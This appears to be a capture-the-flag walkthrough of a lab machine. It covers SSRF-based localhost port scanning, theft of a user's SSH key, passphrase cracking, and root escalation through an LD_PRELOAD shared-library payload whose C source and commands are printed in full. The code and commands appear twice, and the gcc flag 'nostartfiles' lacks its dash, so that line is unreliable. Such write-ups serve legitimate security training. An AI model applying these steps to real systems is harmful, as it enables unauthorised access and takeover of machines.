Target IP: 10.10.164.67
Challenge Description: Exploit a vulnerable web application and some misconfigurations to gain root privileges.
Performing a port scan using the command sudo nmap -sS 10.10.164.67 -p- shows there are two TCP ports open on the target machine: SSH and HTTP on their standard ports, as shown above.
I performed an aggressive port scan using the command sudo nmap -sV -A 10.10.164.67 -p 22,80 and obtained the result shown above. The HTTP application on port 80 seems the most interesting to me. The HTTP request also gets redirected to http://creative.thm according to the scan above. I will need to insert the hostname creative.thm inside my /etc/hosts file.
I inserted the hostname creative.thm inside my /etc/hosts file, as shown above.
I performed a VHOST enumeration using ffuf out of curiousity. The command I used is ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.creative.thm" -u http://creative.thm -fs 178 and got a hit on the entry beta, as shown above. Now I can insert this to my /etc/hosts too. I used the -fs 178 to filter out the garbage result.
Now my /etc/hosts file contains the two entries, as shown above. Now I can begin with the enumeration.
Port 80: HTTP (creative.thm)
The webpage above is displayed for this web application.
I notice the web application is running jQuery 3.4.1. From the past, I know this is vulnerable to XSS attack. I also identified the Contact Us page on the web application. Maybe XSS is an attack vector I can use?
Since the web application is using jQuery 3.4.1 and this is lower than 3.5.0, it is potentially vulnerable to XSS, as shown above. However, when I tried to leverage XSS payloads -- I had no luck. Time to enumerate harder.
I performed a directory search using the command gobuster dir -u http://creative.thm/ -w /usr/share/wordlists/dirb/big.txt -x html,php,txt and got a few hit, as shown above. I find the /assets entry interesting. I browsed to http://creative.thm/assets/ and got a 403 Forbidden page. The only attack vector is checking the beta.creative.thm vhost now.
Port 80: HTTP (beta.creative.thm)
The webpage above is displayed for this web application. It seems to be a URL tester. I scanned the source-code of the webpage and did not find anything useful. Time to put the web application to test.
I fired up Burp Suite and intercepted a request to the web application. I made a request to http://creative.thm, as shown above. I tried command injection but I had no luck, as I obtained the result Dead. Maybe SSRF is an attack vector I can use?
On my machine, I created a text file that contains the numbers from 1 to 65535. Then using ffuf, I checked which ports are open by using the command ffuf -u http://beta.creative.thm/ -w ports_check.txt -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "url=http://127.0.0.1:FUZZ" -fw 3. And I got a hit. There are two TCP ports open: 80 and 1337. The second port seems interesting to me. Maybe I can use the web application to access this port? I browsed to http://127.0.0.1:1337 by using the http://beta.creative.thm web application.
And bingo! Now I can access the directory listing shown above. The entry /home could possibly contain the users of the machine?
I browsed to http://127.0.0.1:1337/home/ using the web application again and got a hit! There is a user called saad, as shown above. One possible attack vector is to obtain the SSH key of this user. Time to test it. I browsed to http://127.0.0.1:1337/home/saad/.ssh/id_rsa using the web application again.
And bingo! Now I have the SSH key of the user saad. I viewed the content of the webpage using the tag view-source. Then I copied the SSH key to my machine.
Since the SSH key is protected by passphrase, I will need to obtain the passphrase. To achieve this, I used the command ssh2john id_rsa > hash to obtain the password hash of this SSH key. Then using the command john hash --wordlist=/usr/share/wordlists/rockyou.txt I managed to obtain the passphrase sweetness of the SSH key, as shown above. Now I can login as this user saad :)
Voila! Now I have access to the SSH application as the user saad, as shown above. I connected to the target machine using the command ssh saad@beta.creative.thm -i id_rsa and the passphrase sweetness.
I transferred Linpeas to the target machine and executed it. And I obtained the crucial information shown above. The user saad is using the password MyStrongestPasswordYet$4291.
Running sudo -l and the new password returns the result shown above. Although the binary /usr/bin/ping can be executed as root, I am more interested by the env_keep+=LD_PRELOAD. Since the environment variable LD_PRELOAD is set, I can exploit it. This shared library misconfiguration can be used for local privilege escalation.
Firstly, I browsed to /tmp directory and created a file called shell.c as shown above. This file contains the code shown below.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
Then I compiled the C file using the commands and performed the linking:
gcc -fPIC -shared -o shell.so shell.c nostartfiles ls -al shell.so sudo LD_PRELOAD=/tmp/shell.so ping
gcc -fPIC -shared -o shell.so shell.c nostartfiles
ls -al shell.so
sudo LD_PRELOAD=/tmp/shell.so ping
And after compiling the executable and running it, I now have root access on the target machine as shown above. GG. Now I have full access on the target machine :)
The two flags are shown above.